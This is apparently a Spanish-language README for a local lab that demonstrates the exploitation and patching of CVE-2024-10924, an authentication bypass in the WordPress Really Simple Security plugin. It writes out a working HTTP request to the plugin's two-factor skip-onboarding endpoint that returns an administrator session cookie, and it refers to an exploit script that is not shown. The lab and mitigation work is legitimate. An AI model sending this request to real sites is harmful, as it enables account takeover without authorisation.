
Demuestra la explotación y mitigación de CVE-2024-10924, una omisión de autenticación en WordPress Really Simple Security, con exploit automatizado en Python, pasos manuales con Burp Suite y verificación de parche.
CVE-2024-10924 - Bypass de Autenticación en Really Simple Security
DESCRIPCIÓN GENERAL Este proyecto demuestra la explotación y mitigación de CVE-2024-10924, una vulnerabilidad crítica de bypass de autenticación en el plugin de WordPress "Really Simple Security".
PASO 1: CONFIGURACIÓN DEL ENTORNO
Inicia el entorno vulnerable de WordPress: cd wordpress-really-simple-security-authn-bypass-vulnerable-application docker-compose up -d
Verifica que los contenedores estén en ejecución: docker ps
Accede a WordPress: http://localhost:1337
Herramientas necesarias:
PASO 2: ESCANEO DE VULNERABILIDADES
Ejecuta el escaneo GVM contra el objetivo:
PASO 3: EXPLOTACIÓN
Método A - Exploit Automatizado en Python: python exploit.py
Método B - Burp Suite Manual:
Intercepta el tráfico hacia http://localhost:1337
Envía una solicitud POST: POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1 Host: localhost:1337 Content-Type: application/json
{"user_id": 1, "login_nonce": "hack", "redirect_to": "/wp-admin/"}
Observa la respuesta con la cabecera Set-Cookie que contiene la sesión de admin
Resultado esperado:
PASO 4: MITIGACIÓN
Aplica el parche para bloquear el endpoint vulnerable: .\patch.ps1
Qué hace esto:
PASO 5: VERIFICACIÓN
Vuelve a ejecutar el exploit (Método A o B): python exploit.py
Resultado esperado después de la mitigación:
NOTAS ADICIONALES
Para detener el entorno: docker-compose down
Para ver los registros del contenedor: docker-compose logs -f
Para acceder legítimamente al admin de WordPress: http://localhost:1337/wp-admin (Revisa docker-compose.yml para las credenciales)